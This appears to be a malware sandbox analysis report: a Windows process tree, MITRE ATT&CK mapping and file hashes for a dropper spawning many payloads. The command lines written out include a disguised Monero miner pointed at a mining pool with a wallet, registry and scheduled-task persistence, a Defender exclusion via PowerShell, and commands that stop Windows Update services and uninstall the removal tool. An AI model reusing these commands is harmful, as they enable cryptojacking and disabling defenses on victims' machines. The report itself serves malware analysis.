C:\Windows\System32\svchost.exe"C:\Windows\System32\svchost.exe" --algo rx/0 --url pool.supportxmr.com:8080 --user 46M39DM1DQjFKUnT3t2KiHNU6qQjmRF79J31fSbtBNafUX9B2gAwysjLFADQ5mhqR4M6C8JJRFXwLPxDHapuCrHE3mRBjTw/lunarig --cpu-max-threads-hint=306⤵PID:8968
-
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:9176
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:1544
-
-
-
C:\Users\Admin\Desktop\a\wudi.exe"C:\Users\Admin\Desktop\a\wudi.exe"4⤵PID:7268
-
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵PID:5564
-
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵PID:5256
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵PID:1292
-
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵PID:6464
-
C:\Users\Admin\Desktop\a\Crawl.exe"C:\Users\Admin\Desktop\a\Crawl.exe"4⤵PID:3444
-
-
C:\Users\Admin\Desktop\a\BootstrapperNew.exe"C:\Users\Admin\Desktop\a\BootstrapperNew.exe"4⤵PID:1256
-
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵PID:6836
-
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵PID:692
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵PID:6900
-
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵PID:7128
-
C:\Users\Admin\Desktop\a\01.exe"C:\Users\Admin\Desktop\a\01.exe"4⤵PID:9016
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9016 -s 3845⤵
- Program crash
PID:8592
-
-
-
C:\Users\Admin\Desktop\a\00.exe"C:\Users\Admin\Desktop\a\00.exe"4⤵PID:8412
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8412 -s 3965⤵
- Program crash
PID:4548
-
-
-
C:\Users\Admin\Desktop\a\02.exe"C:\Users\Admin\Desktop\a\02.exe"4⤵PID:8640
-
C:\Users\Admin\Desktop\a\._cache_02.exe"C:\Users\Admin\Desktop\a\._cache_02.exe"5⤵PID:8568
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8568 -s 4006⤵
- Program crash
PID:8056
-
-
-
-
C:\Users\Admin\Desktop\a\IMG001.exe"C:\Users\Admin\Desktop\a\IMG001.exe"4⤵PID:776
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe5⤵PID:4932
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tftp.exe6⤵
- Kills process with taskkill
PID:3444
-
-
-
C:\Users\Admin\AppData\Local\Temp\tftp.exe"C:\Users\Admin\AppData\Local\Temp\tftp.exe"5⤵PID:3740
-
-
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"5⤵PID:2656
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe6⤵PID:6000
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tftp.exe7⤵
- Kills process with taskkill
PID:9000
-
-
-
C:\Users\Admin\AppData\Local\Temp\tftp.exe"C:\Users\Admin\AppData\Local\Temp\tftp.exe"6⤵PID:7468
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ6⤵PID:5836
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ7⤵PID:6244
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"6⤵PID:9040
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"7⤵
- Scheduled Task/Job: Scheduled Task
PID:7400
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"6⤵PID:8716
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"7⤵
- Scheduled Task/Job: Scheduled Task
PID:5152
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0006⤵
- Power Settings
PID:5408 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:1324
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -standby-timeout-ac 07⤵
- Power Settings
PID:8784
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -hibernate-timeout-ac 07⤵
- Power Settings
PID:4932
-
-
C:\Windows\SysWOW64\powercfg.exePowercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0007⤵
- Power Settings
PID:4448
-
-
-
-
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵PID:5560
-
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵PID:3696
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵PID:6760
-
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵PID:6364
-
C:\Users\Admin\Desktop\a\cbot.exe"C:\Users\Admin\Desktop\a\cbot.exe"4⤵PID:5612
-
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵PID:1352
-
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵PID:3148
-
C:\Users\Admin\Desktop\a\Client.exe"C:\Users\Admin\Desktop\a\Client.exe"4⤵PID:6708
-
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵PID:5136
-
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵PID:3664
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵PID:6880
-
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵PID:2176
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵PID:3092
-
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵PID:6856
-
C:\Users\Admin\Desktop\a\mimikatz.exe"C:\Users\Admin\Desktop\a\mimikatz.exe"4⤵PID:7000
-
-
C:\Users\Admin\Desktop\a\Client-built.exe"C:\Users\Admin\Desktop\a\Client-built.exe"4⤵PID:1548
-
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵PID:3868
-
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵PID:2968
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵PID:1688
-
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵PID:900
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵PID:8492
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵PID:5996
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2148 -parentBuildID 20240401114208 -prefsHandle 1728 -prefMapHandle 2112 -prefsLen 21258 -prefMapSize 243020 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8404967a-912a-41e0-b297-b939cc545f81} 5996 "\\.\pipe\gecko-crash-server-pipe.5996" gpu4⤵PID:8840
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2396 -parentBuildID 20240401114208 -prefsHandle 1724 -prefMapHandle 1720 -prefsLen 21258 -prefMapSize 243020 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {89d41042-0c1c-428f-bc18-63cb819e48b5} 5996 "\\.\pipe\gecko-crash-server-pipe.5996" socket4⤵PID:6228
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3080 -childID 1 -isForBrowser -prefsHandle 2748 -prefMapHandle 1064 -prefsLen 21326 -prefMapSize 243020 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2ac1382c-6cf4-40f9-9037-996f89b72d0f} 5996 "\\.\pipe\gecko-crash-server-pipe.5996" tab4⤵PID:188
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2640 -childID 2 -isForBrowser -prefsHandle 3296 -prefMapHandle 3300 -prefsLen 22179 -prefMapSize 243020 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {af8477fa-bfc3-4e70-9eaa-7f4e5726eff2} 5996 "\\.\pipe\gecko-crash-server-pipe.5996" tab4⤵PID:5432
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5020 -parentBuildID 20240401114208 -prefsHandle 4740 -prefMapHandle 4120 -prefsLen 30178 -prefMapSize 243020 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d9046374-2277-49b4-a722-1e3707eeed51} 5996 "\\.\pipe\gecko-crash-server-pipe.5996" rdd4⤵PID:9208
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5284 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 5288 -prefMapHandle 5292 -prefsLen 30178 -prefMapSize 243020 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fefba586-e768-46f1-8da8-d90792eddcf3} 5996 "\\.\pipe\gecko-crash-server-pipe.5996" utility4⤵PID:8508
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5512 -childID 3 -isForBrowser -prefsHandle 5448 -prefMapHandle 5452 -prefsLen 28181 -prefMapSize 243020 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b2c909bc-ef52-4253-ae10-4f6420011791} 5996 "\\.\pipe\gecko-crash-server-pipe.5996" tab4⤵PID:5012
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5580 -childID 4 -isForBrowser -prefsHandle 5632 -prefMapHandle 5636 -prefsLen 28181 -prefMapSize 243020 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8d74b668-3815-42fe-b07c-64034c4f220a} 5996 "\\.\pipe\gecko-crash-server-pipe.5996" tab4⤵PID:1892
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5828 -childID 5 -isForBrowser -prefsHandle 5904 -prefMapHandle 5900 -prefsLen 28181 -prefMapSize 243020 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2721b12a-ea90-4747-8571-27f4b3514d74} 5996 "\\.\pipe\gecko-crash-server-pipe.5996" tab4⤵PID:8464
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3584 -childID 6 -isForBrowser -prefsHandle 5880 -prefMapHandle 3076 -prefsLen 28631 -prefMapSize 243020 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c4dc9b57-2698-479c-8d9d-8387d4a75028} 5996 "\\.\pipe\gecko-crash-server-pipe.5996" tab4⤵PID:1020
-
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵PID:1144
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵PID:1984
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵PID:7776
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ffc6538cc40,0x7ffc6538cc4c,0x7ffc6538cc583⤵PID:9204
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2180,i,1342031954381004447,11927133924927886080,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=2176 /prefetch:23⤵PID:4816
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1876,i,1342031954381004447,11927133924927886080,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=2320 /prefetch:33⤵PID:6600
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2116,i,1342031954381004447,11927133924927886080,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=2432 /prefetch:83⤵PID:7580
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3172,i,1342031954381004447,11927133924927886080,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=3204 /prefetch:13⤵PID:5472
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3180,i,1342031954381004447,11927133924927886080,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=3344 /prefetch:13⤵PID:8048
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4416,i,1342031954381004447,11927133924927886080,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=4536 /prefetch:13⤵PID:3724
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4912,i,1342031954381004447,11927133924927886080,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=4888 /prefetch:83⤵PID:5656
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4920,i,1342031954381004447,11927133924927886080,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=4840 /prefetch:83⤵PID:8176
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4444,i,1342031954381004447,11927133924927886080,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=4492 /prefetch:13⤵PID:9152
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=4872,i,1342031954381004447,11927133924927886080,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=4788 /prefetch:13⤵PID:5876
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3756
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4056
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3532
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4352
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4220
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:5104
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:1424
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:2364
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:3068
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2280
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3316
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵PID:572
-
C:\Windows\System32\smartscreen.exeC:\Windows\System32\smartscreen.exe -Embedding1⤵PID:928
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵PID:4684
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4236
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:4340
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:2712
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:4368
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:1232
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:4120
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵PID:1576
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3808 -ip 38082⤵PID:4000
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:1920
-
C:\ProgramData\Screenshots\Lightshot.exeC:\ProgramData\Screenshots\Lightshot.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:6932 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:6956 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6964
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:5232
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:1048
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:4996
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:3816
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2592
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:2896
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:5124
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
PID:5708 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5372
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
PID:5512
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
PID:5236
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
PID:5288
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:5296
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:5636
-
-
C:\Windows\system32\dialer.exedialer.exe2⤵PID:6388
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:7152
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5592
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 8008 -ip 80081⤵PID:8912
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 9016 -ip 90161⤵PID:8432
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:8656
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 8008 -ip 80081⤵PID:8884
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 8412 -ip 84121⤵PID:9200
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 8568 -ip 85681⤵PID:8032
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 6988 -ip 69881⤵PID:4548
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:8344
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:6080
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Windows Management Instrumentation
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
1Indicator Removal
2Clear Windows Event Logs
1File Deletion
1Modify Registry
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Discovery
Browser Information Discovery
1Network Service Discovery
1Query Registry
5Remote System Discovery
1System Information Discovery
4System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
526KB
MD5be89d598cd96443479c02b022ff70532
SHA1f0ab69f56ebbbdda791d61fd3d22476d61135871
SHA256a4c4487dcacebf5048b2266233f5645cfe421154f26e6685ced36aa0621037f1
SHA51236e7cf511786d417f5033b7f743211cef995a6203c4e6db22334f7721355a90ac4e21a118c67e3752b7bdef82fccb74bb978dc30d0e7bfcd69d14855dbe6d3ab
-
C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\update-config.json
Filesize102B
MD57d1d7e1db5d8d862de24415d9ec9aca4
SHA1f4cdc5511c299005e775dc602e611b9c67a97c78
SHA256ffad3b0fb11fc38ea243bf3f73e27a6034860709b39bf251ef3eca53d4c3afda
SHA5121688c6725a3607c7b80dfcd6a8bea787f31c21e3368b31cb84635b727675f426b969899a378bd960bd3f27866023163b5460e7c681ae1fcb62f7829b03456477
-
Filesize
753KB
MD580421089b46d27ad31bba48f8946af3f
SHA171f6418b3ad4310c579f0f50beeff472964d349a
SHA25611f931102f640ea8406d95c2eebeadd1462fd205bc651dac57ac1bcac922e8f5
